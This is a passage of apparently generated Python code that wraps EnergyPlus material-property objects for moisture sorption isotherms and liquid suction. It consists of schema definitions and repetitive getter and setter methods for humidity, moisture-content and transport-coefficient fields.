{'name': u'Moisture Content 15',
'pyname': u'moisture_content_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 16',
{'name': u'Relative Humidity Fraction 16',
'pyname': u'relative_humidity_fraction_16',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 16',
{'name': u'Moisture Content 16',
'pyname': u'moisture_content_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 17',
{'name': u'Relative Humidity Fraction 17',
'pyname': u'relative_humidity_fraction_17',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 17',
{'name': u'Moisture Content 17',
'pyname': u'moisture_content_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 18',
{'name': u'Relative Humidity Fraction 18',
'pyname': u'relative_humidity_fraction_18',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 18',
{'name': u'Moisture Content 18',
'pyname': u'moisture_content_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 19',
{'name': u'Relative Humidity Fraction 19',
'pyname': u'relative_humidity_fraction_19',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 19',
{'name': u'Moisture Content 19',
'pyname': u'moisture_content_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 20',
{'name': u'Relative Humidity Fraction 20',
'pyname': u'relative_humidity_fraction_20',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 20',
{'name': u'Moisture Content 20',
'pyname': u'moisture_content_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 21',
{'name': u'Relative Humidity Fraction 21',
'pyname': u'relative_humidity_fraction_21',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 21',
{'name': u'Moisture Content 21',
'pyname': u'moisture_content_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 22',
{'name': u'Relative Humidity Fraction 22',
'pyname': u'relative_humidity_fraction_22',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 22',
{'name': u'Moisture Content 22',
'pyname': u'moisture_content_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 23',
{'name': u'Relative Humidity Fraction 23',
'pyname': u'relative_humidity_fraction_23',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 23',
{'name': u'Moisture Content 23',
'pyname': u'moisture_content_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 24',
{'name': u'Relative Humidity Fraction 24',
'pyname': u'relative_humidity_fraction_24',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 24',
{'name': u'Moisture Content 24',
'pyname': u'moisture_content_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'relative humidity fraction 25',
{'name': u'Relative Humidity Fraction 25',
'pyname': u'relative_humidity_fraction_25',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'moisture content 25',
{'name': u'Moisture Content 25',
'pyname': u'moisture_content_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:SorptionIsotherm',
'pyname': u'MaterialPropertyHeatAndMoistureTransferSorptionIsotherm',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
    """Get IDD field `Material Name`.

    Name of the material that the moisture sorption isotherm is
    attached to (object-list reference).
    Returns str, or None when the field is unset.
    """
    key = "Material Name"
    return self[key]

@material_name.setter
def material_name(self, value=None):
    """Assign IDD field `Material Name`."""
    key = "Material Name"
    self[key] = value
@property
def number_of_isotherm_coordinates(self):
    """Get IDD field `Number of Isotherm Coordinates`.

    Count of (relative humidity, moisture content) data coordinates
    supplied; integer in the range 1-25.
    Returns int, or None when the field is unset.
    """
    key = "Number of Isotherm Coordinates"
    return self[key]

@number_of_isotherm_coordinates.setter
def number_of_isotherm_coordinates(self, value=None):
    """Assign IDD field `Number of Isotherm Coordinates`."""
    key = "Number of Isotherm Coordinates"
    self[key] = value
@property
def relative_humidity_fraction_1(self):
    """Get IDD field `Relative Humidity Fraction 1`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 1"
    return self[key]

@relative_humidity_fraction_1.setter
def relative_humidity_fraction_1(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 1`."""
    key = "Relative Humidity Fraction 1"
    self[key] = value

@property
def moisture_content_1(self):
    """Get IDD field `Moisture Content 1`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 1"
    return self[key]

@moisture_content_1.setter
def moisture_content_1(self, value=None):
    """Assign IDD field `Moisture Content 1`."""
    key = "Moisture Content 1"
    self[key] = value

@property
def relative_humidity_fraction_2(self):
    """Get IDD field `Relative Humidity Fraction 2`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 2"
    return self[key]

@relative_humidity_fraction_2.setter
def relative_humidity_fraction_2(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 2`."""
    key = "Relative Humidity Fraction 2"
    self[key] = value

@property
def moisture_content_2(self):
    """Get IDD field `Moisture Content 2`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 2"
    return self[key]

@moisture_content_2.setter
def moisture_content_2(self, value=None):
    """Assign IDD field `Moisture Content 2`."""
    key = "Moisture Content 2"
    self[key] = value

@property
def relative_humidity_fraction_3(self):
    """Get IDD field `Relative Humidity Fraction 3`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 3"
    return self[key]

@relative_humidity_fraction_3.setter
def relative_humidity_fraction_3(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 3`."""
    key = "Relative Humidity Fraction 3"
    self[key] = value

@property
def moisture_content_3(self):
    """Get IDD field `Moisture Content 3`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 3"
    return self[key]

@moisture_content_3.setter
def moisture_content_3(self, value=None):
    """Assign IDD field `Moisture Content 3`."""
    key = "Moisture Content 3"
    self[key] = value

@property
def relative_humidity_fraction_4(self):
    """Get IDD field `Relative Humidity Fraction 4`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 4"
    return self[key]

@relative_humidity_fraction_4.setter
def relative_humidity_fraction_4(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 4`."""
    key = "Relative Humidity Fraction 4"
    self[key] = value

@property
def moisture_content_4(self):
    """Get IDD field `Moisture Content 4`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 4"
    return self[key]

@moisture_content_4.setter
def moisture_content_4(self, value=None):
    """Assign IDD field `Moisture Content 4`."""
    key = "Moisture Content 4"
    self[key] = value
@property
def relative_humidity_fraction_5(self):
    """Get IDD field `Relative Humidity Fraction 5`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 5"
    return self[key]

@relative_humidity_fraction_5.setter
def relative_humidity_fraction_5(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 5`."""
    key = "Relative Humidity Fraction 5"
    self[key] = value

@property
def moisture_content_5(self):
    """Get IDD field `Moisture Content 5`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 5"
    return self[key]

@moisture_content_5.setter
def moisture_content_5(self, value=None):
    """Assign IDD field `Moisture Content 5`."""
    key = "Moisture Content 5"
    self[key] = value

@property
def relative_humidity_fraction_6(self):
    """Get IDD field `Relative Humidity Fraction 6`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 6"
    return self[key]

@relative_humidity_fraction_6.setter
def relative_humidity_fraction_6(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 6`."""
    key = "Relative Humidity Fraction 6"
    self[key] = value

@property
def moisture_content_6(self):
    """Get IDD field `Moisture Content 6`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 6"
    return self[key]

@moisture_content_6.setter
def moisture_content_6(self, value=None):
    """Assign IDD field `Moisture Content 6`."""
    key = "Moisture Content 6"
    self[key] = value

@property
def relative_humidity_fraction_7(self):
    """Get IDD field `Relative Humidity Fraction 7`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 7"
    return self[key]

@relative_humidity_fraction_7.setter
def relative_humidity_fraction_7(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 7`."""
    key = "Relative Humidity Fraction 7"
    self[key] = value

@property
def moisture_content_7(self):
    """Get IDD field `Moisture Content 7`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 7"
    return self[key]

@moisture_content_7.setter
def moisture_content_7(self, value=None):
    """Assign IDD field `Moisture Content 7`."""
    key = "Moisture Content 7"
    self[key] = value

@property
def relative_humidity_fraction_8(self):
    """Get IDD field `Relative Humidity Fraction 8`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 8"
    return self[key]

@relative_humidity_fraction_8.setter
def relative_humidity_fraction_8(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 8`."""
    key = "Relative Humidity Fraction 8"
    self[key] = value

@property
def moisture_content_8(self):
    """Get IDD field `Moisture Content 8`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 8"
    return self[key]

@moisture_content_8.setter
def moisture_content_8(self, value=None):
    """Assign IDD field `Moisture Content 8`."""
    key = "Moisture Content 8"
    self[key] = value
@property
def relative_humidity_fraction_9(self):
    """Get IDD field `Relative Humidity Fraction 9`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 9"
    return self[key]

@relative_humidity_fraction_9.setter
def relative_humidity_fraction_9(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 9`."""
    key = "Relative Humidity Fraction 9"
    self[key] = value

@property
def moisture_content_9(self):
    """Get IDD field `Moisture Content 9`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 9"
    return self[key]

@moisture_content_9.setter
def moisture_content_9(self, value=None):
    """Assign IDD field `Moisture Content 9`."""
    key = "Moisture Content 9"
    self[key] = value

@property
def relative_humidity_fraction_10(self):
    """Get IDD field `Relative Humidity Fraction 10`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 10"
    return self[key]

@relative_humidity_fraction_10.setter
def relative_humidity_fraction_10(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 10`."""
    key = "Relative Humidity Fraction 10"
    self[key] = value

@property
def moisture_content_10(self):
    """Get IDD field `Moisture Content 10`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 10"
    return self[key]

@moisture_content_10.setter
def moisture_content_10(self, value=None):
    """Assign IDD field `Moisture Content 10`."""
    key = "Moisture Content 10"
    self[key] = value

@property
def relative_humidity_fraction_11(self):
    """Get IDD field `Relative Humidity Fraction 11`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 11"
    return self[key]

@relative_humidity_fraction_11.setter
def relative_humidity_fraction_11(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 11`."""
    key = "Relative Humidity Fraction 11"
    self[key] = value

@property
def moisture_content_11(self):
    """Get IDD field `Moisture Content 11`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 11"
    return self[key]

@moisture_content_11.setter
def moisture_content_11(self, value=None):
    """Assign IDD field `Moisture Content 11`."""
    key = "Moisture Content 11"
    self[key] = value

@property
def relative_humidity_fraction_12(self):
    """Get IDD field `Relative Humidity Fraction 12`.

    Relative humidity as a dimensionless fraction (0.0-1.0).
    Returns float, or None when the field is unset.
    """
    key = "Relative Humidity Fraction 12"
    return self[key]

@relative_humidity_fraction_12.setter
def relative_humidity_fraction_12(self, value=None):
    """Assign IDD field `Relative Humidity Fraction 12`."""
    key = "Relative Humidity Fraction 12"
    self[key] = value

@property
def moisture_content_12(self):
    """Get IDD field `Moisture Content 12`.

    Moisture-content coordinate in kg/m3 (>= 0.0).
    Returns float, or None when the field is unset.
    """
    key = "Moisture Content 12"
    return self[key]

@moisture_content_12.setter
def moisture_content_12(self, value=None):
    """Assign IDD field `Moisture Content 12`."""
    key = "Moisture Content 12"
    self[key] = value
@property
def relative_humidity_fraction_13(self):
"""field `Relative Humidity Fraction 13`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_13` or None if not set
"""
return self["Relative Humidity Fraction 13"]
@relative_humidity_fraction_13.setter
def relative_humidity_fraction_13(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 13`"""
self["Relative Humidity Fraction 13"] = value
@property
def moisture_content_13(self):
"""field `Moisture Content 13`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_13` or None if not set
"""
return self["Moisture Content 13"]
@moisture_content_13.setter
def moisture_content_13(self, value=None):
"""Corresponds to IDD field `Moisture Content 13`"""
self["Moisture Content 13"] = value
@property
def relative_humidity_fraction_14(self):
"""field `Relative Humidity Fraction 14`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_14` or None if not set
"""
return self["Relative Humidity Fraction 14"]
@relative_humidity_fraction_14.setter
def relative_humidity_fraction_14(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 14`"""
self["Relative Humidity Fraction 14"] = value
@property
def moisture_content_14(self):
"""field `Moisture Content 14`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_14` or None if not set
"""
return self["Moisture Content 14"]
@moisture_content_14.setter
def moisture_content_14(self, value=None):
"""Corresponds to IDD field `Moisture Content 14`"""
self["Moisture Content 14"] = value
@property
def relative_humidity_fraction_15(self):
"""field `Relative Humidity Fraction 15`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_15` or None if not set
"""
return self["Relative Humidity Fraction 15"]
@relative_humidity_fraction_15.setter
def relative_humidity_fraction_15(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 15`"""
self["Relative Humidity Fraction 15"] = value
@property
def moisture_content_15(self):
"""field `Moisture Content 15`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_15` or None if not set
"""
return self["Moisture Content 15"]
@moisture_content_15.setter
def moisture_content_15(self, value=None):
"""Corresponds to IDD field `Moisture Content 15`"""
self["Moisture Content 15"] = value
@property
def relative_humidity_fraction_16(self):
"""field `Relative Humidity Fraction 16`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_16` or None if not set
"""
return self["Relative Humidity Fraction 16"]
@relative_humidity_fraction_16.setter
def relative_humidity_fraction_16(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 16`"""
self["Relative Humidity Fraction 16"] = value
@property
def moisture_content_16(self):
    """Getter for IDD field `Moisture Content 16`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 16"
    return self[field_key]

@moisture_content_16.setter
def moisture_content_16(self, value=None):
    """Setter for IDD field `Moisture Content 16` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 16"
    self[field_key] = value
@property
def relative_humidity_fraction_17(self):
    """Getter for IDD field `Relative Humidity Fraction 17`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 17"
    return self[field_key]

@relative_humidity_fraction_17.setter
def relative_humidity_fraction_17(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 17`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 17"
    self[field_key] = value
@property
def moisture_content_17(self):
    """Getter for IDD field `Moisture Content 17`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 17"
    return self[field_key]

@moisture_content_17.setter
def moisture_content_17(self, value=None):
    """Setter for IDD field `Moisture Content 17` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 17"
    self[field_key] = value
@property
def relative_humidity_fraction_18(self):
    """Getter for IDD field `Relative Humidity Fraction 18`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 18"
    return self[field_key]

@relative_humidity_fraction_18.setter
def relative_humidity_fraction_18(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 18`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 18"
    self[field_key] = value
@property
def moisture_content_18(self):
    """Getter for IDD field `Moisture Content 18`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 18"
    return self[field_key]

@moisture_content_18.setter
def moisture_content_18(self, value=None):
    """Setter for IDD field `Moisture Content 18` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 18"
    self[field_key] = value
@property
def relative_humidity_fraction_19(self):
    """Getter for IDD field `Relative Humidity Fraction 19`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 19"
    return self[field_key]

@relative_humidity_fraction_19.setter
def relative_humidity_fraction_19(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 19`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 19"
    self[field_key] = value
@property
def moisture_content_19(self):
    """Getter for IDD field `Moisture Content 19`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 19"
    return self[field_key]

@moisture_content_19.setter
def moisture_content_19(self, value=None):
    """Setter for IDD field `Moisture Content 19` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 19"
    self[field_key] = value
@property
def relative_humidity_fraction_20(self):
    """Getter for IDD field `Relative Humidity Fraction 20`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 20"
    return self[field_key]

@relative_humidity_fraction_20.setter
def relative_humidity_fraction_20(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 20`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 20"
    self[field_key] = value
@property
def moisture_content_20(self):
    """Getter for IDD field `Moisture Content 20`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 20"
    return self[field_key]

@moisture_content_20.setter
def moisture_content_20(self, value=None):
    """Setter for IDD field `Moisture Content 20` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 20"
    self[field_key] = value
@property
def relative_humidity_fraction_21(self):
    """Getter for IDD field `Relative Humidity Fraction 21`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 21"
    return self[field_key]

@relative_humidity_fraction_21.setter
def relative_humidity_fraction_21(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 21`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 21"
    self[field_key] = value
@property
def moisture_content_21(self):
    """Getter for IDD field `Moisture Content 21`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 21"
    return self[field_key]

@moisture_content_21.setter
def moisture_content_21(self, value=None):
    """Setter for IDD field `Moisture Content 21` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 21"
    self[field_key] = value
@property
def relative_humidity_fraction_22(self):
    """Getter for IDD field `Relative Humidity Fraction 22`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 22"
    return self[field_key]

@relative_humidity_fraction_22.setter
def relative_humidity_fraction_22(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 22`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 22"
    self[field_key] = value
@property
def moisture_content_22(self):
    """Getter for IDD field `Moisture Content 22`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 22"
    return self[field_key]

@moisture_content_22.setter
def moisture_content_22(self, value=None):
    """Setter for IDD field `Moisture Content 22` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 22"
    self[field_key] = value
@property
def relative_humidity_fraction_23(self):
    """Getter for IDD field `Relative Humidity Fraction 23`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 23"
    return self[field_key]

@relative_humidity_fraction_23.setter
def relative_humidity_fraction_23(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 23`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 23"
    self[field_key] = value
@property
def moisture_content_23(self):
    """Getter for IDD field `Moisture Content 23`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 23"
    return self[field_key]

@moisture_content_23.setter
def moisture_content_23(self, value=None):
    """Setter for IDD field `Moisture Content 23` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 23"
    self[field_key] = value
@property
def relative_humidity_fraction_24(self):
    """Getter for IDD field `Relative Humidity Fraction 24`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 24"
    return self[field_key]

@relative_humidity_fraction_24.setter
def relative_humidity_fraction_24(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 24`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 24"
    self[field_key] = value
@property
def moisture_content_24(self):
    """Getter for IDD field `Moisture Content 24`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 24"
    return self[field_key]

@moisture_content_24.setter
def moisture_content_24(self, value=None):
    """Setter for IDD field `Moisture Content 24` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 24"
    self[field_key] = value
@property
def relative_humidity_fraction_25(self):
    """Getter for IDD field `Relative Humidity Fraction 25`.

    The relative humidity is a dimensionless fraction (value <= 1.0).

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Relative Humidity Fraction 25"
    return self[field_key]

@relative_humidity_fraction_25.setter
def relative_humidity_fraction_25(self, value=None):
    """Setter for IDD field `Relative Humidity Fraction 25`.

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Relative Humidity Fraction 25"
    self[field_key] = value
@property
def moisture_content_25(self):
    """Getter for IDD field `Moisture Content 25`.

    Units: kg/m3.

    Returns:
        float: stored value, or None if the field is not set.
    """
    field_key = "Moisture Content 25"
    return self[field_key]

@moisture_content_25.setter
def moisture_content_25(self, value=None):
    """Setter for IDD field `Moisture Content 25` (kg/m3).

    Args:
        value (float): new value for the field; None clears it.

    Raises:
        ValueError: if `value` is not a valid value.
    """
    field_key = "Moisture Content 25"
    self[field_key] = value
class MaterialPropertyHeatAndMoistureTransferSuction(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Suction`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between liquid suction transport coefficient and moisture content
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
# Schema for `MaterialProperty:HeatAndMoistureTransfer:Suction`.
# The 25 (moisture content, liquid transport coefficient) field pairs differ
# only in their index and in `required-field` (True only for pair 1), so the
# repeated entries are generated programmatically instead of hand-duplicated.
# The resulting dict is value- and order-identical to the expanded literal.
_schema = {'extensible-fields': OrderedDict(),
           'fields': OrderedDict(
               [(u'material name',
                 {'name': u'Material Name',
                  'pyname': u'material_name',
                  'required-field': True,
                  'autosizable': False,
                  'autocalculatable': False,
                  'type': u'object-list'}),
                (u'number of suction points',
                 {'name': u'Number of Suction points',
                  'pyname': u'number_of_suction_points',
                  'maximum': 25,
                  'required-field': True,
                  'autosizable': False,
                  'minimum': 1,
                  'autocalculatable': False,
                  'type': u'integer'})]
               + [entry
                  for i in range(1, 26)
                  for entry in (
                      (u'moisture content %d' % i,
                       {'name': u'Moisture Content %d' % i,
                        'pyname': u'moisture_content_%d' % i,
                        'required-field': i == 1,
                        'autosizable': False,
                        'minimum': 0.0,
                        'autocalculatable': False,
                        'type': 'real',
                        'unit': u'kg/m3'}),
                      (u'liquid transport coefficient %d' % i,
                       {'name': u'Liquid Transport Coefficient %d' % i,
                        'pyname': u'liquid_transport_coefficient_%d' % i,
                        'required-field': i == 1,
                        'autosizable': False,
                        'minimum': 0.0,
                        'autocalculatable': False,
                        'type': 'real',
                        'unit': u'm2/s'}))]),
           'format': None,
           'group': u'Surface Construction Elements',
           'min-fields': 0,
           'name': u'MaterialProperty:HeatAndMoistureTransfer:Suction',
           'pyname': u'MaterialPropertyHeatAndMoistureTransferSuction',
           'required-object': False,
           'unique-object': False}
@property
def material_name(self):
    """Getter for IDD field `Material Name`.

    Name of the material that the moisture properties are added to.

    Returns:
